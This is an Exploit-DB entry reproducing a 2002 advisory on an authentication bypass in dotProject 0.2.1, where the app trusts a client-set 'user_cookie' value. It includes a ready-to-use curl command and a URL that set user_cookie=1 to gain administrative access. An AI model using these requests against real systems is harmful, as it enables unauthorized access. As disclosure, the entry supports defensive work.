dotProject 0.2.1 - User Cookie Authentication Bypass

EDB-ID:

21661

CVE:

2002-1428

EDB Verified:

Author:

pokleyzz

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2002-07-29

Vulnerable App: 
source: https://www.securityfocus.com/bid/5347/info

dotproject is prone to an issue which may allow remote attackers to bypass authentication and gain administrative access to the software. 

This may be accomplished by submitting a maliciously crafted 'user_cookie' value either manually or via manipulation of URI parameters.

This problem is due to the software relying on the user 'cookie_value' to authenticate the user.

curl -b user_cookie=1 http://server/project/index.php?m=projects

or 

http://server/project/index.php?m=projects&user_cookie=1
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services